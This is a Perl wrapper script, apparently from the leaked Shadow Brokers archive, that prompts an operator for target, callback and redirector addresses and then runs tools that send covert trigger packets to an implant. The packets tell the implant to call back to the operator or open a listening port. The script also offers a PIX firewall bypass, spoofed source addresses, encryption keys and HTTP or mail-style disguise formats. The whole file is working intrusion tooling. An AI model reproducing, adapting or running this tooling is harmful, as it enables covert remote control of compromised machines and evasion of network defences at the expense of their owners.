shadowbrokers-exploits/windows/Resources/Pc/Legacy/Exploits/PC_Trigger/run_pctrigger.pl
2017-04-14 11:45:07 +02:00

468 lines
14 KiB
Perl

use strict;
use vars qw($VERSION);
$::VERSION = "PC Trigger Wrapper: Version 1.5.1";
print "$::VERSION\n\n";
use FindBin;
use lib "$FindBin::Bin";
use Getopt::Long;
use Cwd;
use lib "$FindBin::Bin\\..\\..\\..\\..\\LegacyWindowsExploits\\Resources\\Perl";
use ExploitUtils qw(
$EU_LOGFILE
$EU_VERBOSE
$EU_BATCHMODE
EU_LogInit
EU_Log
EU_ExitMessage
EU_GetChoice
EU_GetInput
EU_GetExistingDir
EU_GetIP
EU_GetLocalIP
EU_GetRootDir
EU_GetPort
EU_RunCommand
EU_GetAddr
);
use vars qw($REGPROBE $RIDEAREA $PAYLOAD $CIEXE $RPCTOUCH @DEPFILES);
my %opts = ();
GetOptions(\%opts, "v", "h", "q|?", "b", "e=s", "d=s", "t=s", "c=s") or &print_script_usage(0);
if (scalar(@ARGV) > 0 ) {
&EU_Log(1, "Extraneous arguments found on command line: @ARGV");
&EU_Log(1, "Arguments will be ingnored");
while(@ARGV) {shift;}
}
if (!defined($opts{"e"})) {
&EU_Log(1, "A -e option must be supplied.");
&print_usage(0);
}
$::SEND_PC_TRIGGER = "Resources\\PC\\Tools\\SendPCTrigger.exe";
$::SEND_DD_TRIGGER = "Resources\\PC\\Tools\\SendDDTrigger.exe";
@DEPFILES = ($::SEND_PC_TRIGGER, $::SEND_DD_TRIGGER);
my $work_dir = "E:\\";
my $root_dir = "$FindBin::Bin\\..\\..";
my $logfile_prefix = "pctrigger_";
my $logfile_suffix = "_script.log";
my $TargetIp = 0;
&print_usage(1) if (defined $opts{"h"});
&print_usage(0) if (defined $opts{"q"});
$ExploitUtils::EU_VERBOSE = 1 if (defined $opts{"v"});
$ExploitUtils::EU_BATCHMODE = 1 if (defined $opts{"b"});
$work_dir = $opts{"d"} if (defined $opts{"d"});
$root_dir = $opts{"c"} if (defined $opts{"c"});
$TargetIp = $opts{"t"} if (defined $opts{"t"});
if ($ENV{"OS"} ne "Windows_NT") {
&EU_ExitMessage(1,"This script requires Windows NT or Windows 2000");
}
$work_dir = &EU_GetExistingDir("Enter pathname for operation's working directory", $work_dir, 1);
$root_dir = &EU_GetRootDir($root_dir,@::DEPFILES);
&EU_LogInit($logfile_prefix, $logfile_suffix, $work_dir);
&EU_Log(0,"$::VERSION");
&EU_Log(0,"\nChanging to working directory: $work_dir");
chdir $work_dir || &EU_ExitMessage(1,"Unable to change to working directory: $work_dir");
my $cmd = &validate_parms($root_dir, $TargetIp);
my $cur_dir = cwd();
my $answer;
if(!$EU_BATCHMODE) {
$answer = &EU_GetInput("\nReady to send trigger ([y],n,quit)? ", "y");
&EU_ExitMessage(0,"User terminated script") if ($answer ne "y" and $answer ne "Y");
}
&EU_Log(1, "Running command: $cmd");
&EU_RunCommand($cmd);
chdir $cur_dir || &EU_ExitMessage(1,"Unable to switch back to initial directory: $cur_dir");
&EU_ExitMessage(0,"\nDone with $::0.");
sub print_usage() {
my ($verbose) = @_;
print "$::VERSION\n";
print qq~
Usage: $::0 [-v] [-h] [-?] [-b]
[-d <working directory>] [-e <exploits directory>]
[-t <target IP>]
~;
if ($verbose) {
print qq~
-v verbose mode. Default non-verbose mode.
-h Print this help information.
-? Print abbreviated help information.
-b Batch (non-interactive) mode. Default interactive mode.
-d <working directory> Working Directory
Top-level directory where operation\'s files will be
generated. Default E:\.
-e <exploits directory> Exploits Directory
Top-level directory containing exploit files.
Default one directory up from directory containing this script.
-t <target IP> Target IP address.
Default derived as last part of working directory name.
~;
}
&EU_ExitMessage(1,"End of help.");
}
sub validate_parms() {
my ($root_dir, $TargetIp) = @_;
my ($cmd, $args);
while (1) {
$cmd = "";
$args = "";
my $redirectFlag;
my $retcode = &EU_GetInput("\nWill this operation be REDIRECTED (y,[n])? ", "n");
if( ($retcode eq "y") or ($retcode eq "Y") ) { $redirectFlag = 1; }
else { $redirectFlag = 0; }
$TargetIp = &EU_GetIP("\nEnter the Target's IP address", $TargetIp);
my $finalDestIp = &EU_GetIP("\nEnter the final destination IP address", $TargetIp);
my $LocalIp = &EU_GetLocalIP("Enter the Local IP address", undef);
my $SourceIp = &EU_GetIP("\nEnter the Source IP address", $LocalIp);
$args = $args . " -sourceaddress $SourceIp";
my $TargetId;
while (!defined($TargetId)) {
my $id = &EU_GetInput("\nEnter the Target's PC ID: ", "");
if ($id =~ /^(0x){0,1}[0-9]+$/) {
$TargetId = $id;
} else {
&EU_Log(1, "\nThe given ID must be number\n");
}
}
$args = $args . " -id $TargetId";
my ($RedirectIp, $RedirectPort);
if ($redirectFlag == 1) {
$RedirectIp = &EU_GetIP("\nEnter the Redirection IP address", "127.0.0.1");
$RedirectPort = &EU_GetPort("\nEnter the Redirection port");
$args = $args . " -redirect $RedirectIp $RedirectPort";
}
my @triggerChoices = (
{name => "PeddleCheap ICMP"},
{name => "CordialFlimsy"});
my $pTriggerChoice = &EU_GetChoice("Pick the trigger type", 2, @triggerChoices);
if ($pTriggerChoice == undef) {
&EU_ExitMessage(1,"User terminated script\n");
}
my @protoChoices = (
{name => "icmp",
default0 => 8,
default1 => 0
},
{name => "tcp",
default0 => 0,
default1 => 80
},
{name => "udp",
default0 => 0,
default1 => 53
});
my @firewallChoices = (
{name => "NONE",
args => ""},
{name => "PIX",
args => " -firewall pix"}
);
my @formatChoices = (
{name => "NONE",
args => ""}
);
my $callback;
if ($$pTriggerChoice{name} eq "PeddleCheap ICMP") {
$callback = 1;
} else {
my @actionChoices = (
{name => "Callback"},
{name => "Listen"});
my $pActionChoice = &EU_GetChoice("Pick the trigger action", 1, @actionChoices);
if ($pActionChoice == undef) {
&EU_ExitMessage(1,"User terminated script\n");
}
if ($$pActionChoice{name} eq "Callback") {
$callback = 1;
} else {
$callback = 0;
}
}
my $actionIp;
my $actionSrcPort;
my $actionDstPort;
my $actionTime;
if ($callback) {
$actionIp = &EU_GetIP("\nEnter the CALLBACK IP address", $LocalIp);
$actionSrcPort = &EU_GetPort("\nEnter the callback source port", 0);
$actionDstPort = &EU_GetPort("\nEnter the callback destination port", 0);
$args = $args . " -callback $actionIp $actionDstPort $actionSrcPort";
} else {
$actionIp = &EU_GetIP("\nEnter the LISTEN bind address", "0.0.0.0");
$actionSrcPort = &EU_GetPort("\nEnter the LISTEN port", 1934);
$actionTime = &EU_GetPort("\nEnter the LISTEN time (in seconds)", 0);
$args = $args . " -listen $actionIp $actionSrcPort $actionTime";
}
my $pChoice;
my $pFirewallChoice;
my ($timestamp, $tcpConnect, $sendTo, $sendFrom, $tcpFlags);
my ($pFormatChoice, $webpage, $action, $domain, $userAgent);
if ($$pTriggerChoice{name} eq "PeddleCheap ICMP") {
$pChoice = $protoChoices[0];
$cmd = $::SEND_PC_TRIGGER;
} else {
$cmd = $::SEND_DD_TRIGGER;
$pChoice = &EU_GetChoice("Pick the trigger type", 2, @protoChoices);
if ($pChoice == undef) {
&EU_ExitMessage(1,"User terminated script\n");
}
$args = $args . " -protocol $$pChoice{name}";
# get keyfile for encryption
my $keyFile = "$root_dir\\Resources\\PC\\Keys\\Default\\private_key.bin";
$keyFile = &EU_GetInput("Enter the private key location [$keyFile]: ", $keyFile);
$args = $args . " -keyfile \"$keyFile\"";
# get timestamp
my $val;
if ($TargetId == 0) {
# timestamp must be given
$val = "y";
} else {
$val = &EU_GetInput("Timestamp the trigger packet ([y],n,quit)? ", "y");
}
if (($val eq "y") || ($val eq "Y")) {
while (1) {
my ($sec,$min,$hour,$mday,$mon,$year,$extra) = gmtime();
my $currentTime = sprintf("%02u/%02u/%04u %02u:%02u:%02u", $mon+1, $mday, $year+1900, $hour, $min, $sec);
$timestamp = &EU_GetInput("Enter timestamp [$currentTime]: ", "$currentTime");
if ($timestamp =~ /^[0-9]{1,2}\/[0-9]{1,2}\/[0-9]{4} [0-9]{1,2}:[0-9]{1,2}:[0-9]{1,2}$/) {
last;
} else {
&EU_Log(1, "Given timestamp is invalid ($timestamp)\n");
}
}
$args = $args . " -timestamp \"$timestamp\"";
}
# firewall bypass
$pFirewallChoice = &EU_GetChoice("Pick the firewall bypass type", 1, @firewallChoices);
if ($pFirewallChoice == undef) {
&EU_ExitMessage(1,"User terminated script\n");
}
$args = $args . $$pFirewallChoice{args};
# tcp connect
if ($$pChoice{name} eq "tcp") {
$val = &EU_GetInput("Perform a full TCP connection (y,[n])? ", "n");
push @formatChoices, { name => "Http", args => " -format Http"};
if (($val eq "y") || ($val eq "Y")) {
$tcpConnect = "YES";
$args = $args . " -tcpconnect";
push @formatChoices, { name => "SendMail", args => " -format sendmail"};
} else {
$tcpConnect = "NO";
# change tcp flags
while ($tcpFlags == undef) {
$val = &EU_GetInput("Enter comma seperated TCP flags [ack] : ", "ack");
if ($val =~ /^((syn|fin|rst|push|ack|urg),)*(syn|fin|rst|push|ack|urg){1}$/) {
$tcpFlags = $val;
$args = $args . " -tcpflags $tcpFlags";
last;
} else {
&EU_Log(1, "Invalid tcp flags (valid flags include: syn, fin, rst, push, ack, urg)");
}
}
}
}
$pFormatChoice = &EU_GetChoice("Pick the packet format", 1, @formatChoices);
if($pFormatChoice == undef) {
&EU_ExitMessage(1,"User terminated script\n");
}
$args = $args . $$pFormatChoice{args};
if(lc $$pFormatChoice{name} eq "http") {
$userAgent = "Mozilla 4.0 (compatible)";
$domain;
$webpage = "/";
my @actionChoices = (
{name => "Get Action",
args => " -action GET"},
{name => "Post Action",
args => " -action POST"}
);
$userAgent = &EU_GetInput("Enter the user-agent [$userAgent] : ", $userAgent);
while (!defined($domain)) {
my $td = &EU_GetInput("Enter the domain : ", "");
if(!($td eq "")) {
$domain = $td;
}
}
$webpage = &EU_GetInput("Enter the webpage [$webpage] : ", $webpage);
if($webpage =~ /^[^\/].*$/ && $domain =~ /^.*[^\/]$/) {
$webpage = "/$webpage";
}
my $pActionChoice = &EU_GetChoice("Pick the HTTP action", 1, @actionChoices);
if($pActionChoice == undef) {
&EU_ExitMessage(1, "User terminated script\n");
}
$args = $args . $$pActionChoice{args} . " -useragent \"$userAgent\" -domain \"$domain\" -webpage \"$webpage\"";
$action = $$pActionChoice{name};
}
# send-addresses
$val = &EU_GetInput("Provide send-to/send-from addresses (y,[n])? ", "n");
if (($val eq "y") || ($val eq "Y")) {
$sendTo = &EU_GetInput("Provide send-to address : ", "");
$sendFrom = &EU_GetInput("Provide send-from address : ", "");
$args = $args . " -send-addresses \"$sendTo\" \"$sendFrom\"";
}
}
if ($$pChoice{name} eq "icmp") {
$$pChoice{default0} = &EU_GetPort("\nEnter the ICMP type", $$pChoice{default0});
$$pChoice{default1} = &EU_GetPort("\nEnter the ICMP code", $$pChoice{default1});
if ($$pTriggerChoice{name} eq "PeddleCheap ICMP") {
$args = $args . " -target $TargetIp $finalDestIp -icmp-options $$pChoice{default0} $$pChoice{default1}";
} else {
$args = $args . " -target $TargetIp -icmp-options $$pChoice{default0} $$pChoice{default1} -destIp $finalDestIp";
}
} else {
$$pChoice{default0} = &EU_GetPort("\nEnter the source port", $$pChoice{default0});
$$pChoice{default1} = &EU_GetPort("\nEnter the destination port", $$pChoice{default1});
$args = $args . " -target $TargetIp $$pChoice{default1} $$pChoice{default0} -destIp $finalDestIp";
}
&EU_Log(1,"\nConfirm Network Parameters:\n");
&EU_Log(1,"Root Directory : $root_dir");
if( $redirectFlag ) {
&EU_Log(1,"Using Redirection : True");
&EU_Log(1,"Redirector IP : $RedirectIp");
&EU_Log(1,"Redirector Port : $RedirectPort");
} else {
&EU_Log(1,"Using Redirection : False");
}
&EU_Log(1,"Target IP : $TargetIp");
&EU_Log(1,"Protocol : $$pChoice{name}");
&EU_Log(1,"Source IP : $SourceIp");
if ($callback) {
&EU_Log(1,"Callback IP : $actionIp");
&EU_Log(1,"Callback Src Port : $actionSrcPort");
&EU_Log(1,"Callback Dst Port : $actionDstPort");
} else {
&EU_Log(1,"Listen bind IP : $actionIp");
&EU_Log(1,"Listen Port : $actionSrcPort");
&EU_Log(1,"Listen Time : $actionTime");
}
&EU_Log(1,"Type : $$pTriggerChoice{name} ($$pChoice{name})");
if ($$pChoice{name} eq "icmp") {
&EU_Log(1,"ICMP type : $$pChoice{default0}");
&EU_Log(1,"ICMP code : $$pChoice{default1}");
} else {
&EU_Log(1,"Target Src Port : $$pChoice{default0}");
&EU_Log(1,"Target Dst Port : $$pChoice{default1}");
}
&EU_Log(1,"Target ID : $TargetId");
if (defined($timestamp)) {
&EU_Log(1,"Timestamp : $timestamp");
}
if (defined($pFirewallChoice)) {
&EU_Log(1,"Firewall Bypass : $$pFirewallChoice{name}");
}
if (defined($tcpConnect)) {
&EU_Log(1,"Full TCP Connection : $tcpConnect");
}
if (defined($tcpFlags)) {
&EU_Log(1,"TCP flags : $tcpFlags");
}
if (defined($sendTo) && defined($sendFrom)) {
&EU_Log(1,"Send-To Address : $sendTo");
&EU_Log(1,"Send-From Address : $sendFrom");
}
if (defined($pFormatChoice)) {
&EU_Log(1,"Format : " . $$pFormatChoice{name});
}
if (defined($action) && defined($webpage) && defined($userAgent) && defined($domain)) {
&EU_Log(1,"Action : $action");
&EU_Log(1,"Domain : $domain");
&EU_Log(1,"Webpage : $webpage");
&EU_Log(1,"User-Agent : $userAgent");
}
my $okay = &EU_GetInput("\nContinue with the current values ([y],n,quit)? ","y");
&EU_Log(0, "\nContinue with the current values ([y],n,quit)? $okay");
if( ($okay eq "quit") or ($okay eq "QUIT") or ($okay eq "q") or ($okay eq "Q") ) {
&EU_ExitMessage(1,"User terminated script\n");
}
elsif( ($okay eq "n") or ($okay eq "N") ) {
&EU_Log(1, "Returning to top of script...\n");
next;
}
elsif( ($okay eq "y") or ($okay eq "Y") ) {
last;
}
}
return ("\"$root_dir\\$cmd\"" . $args);
}
__END__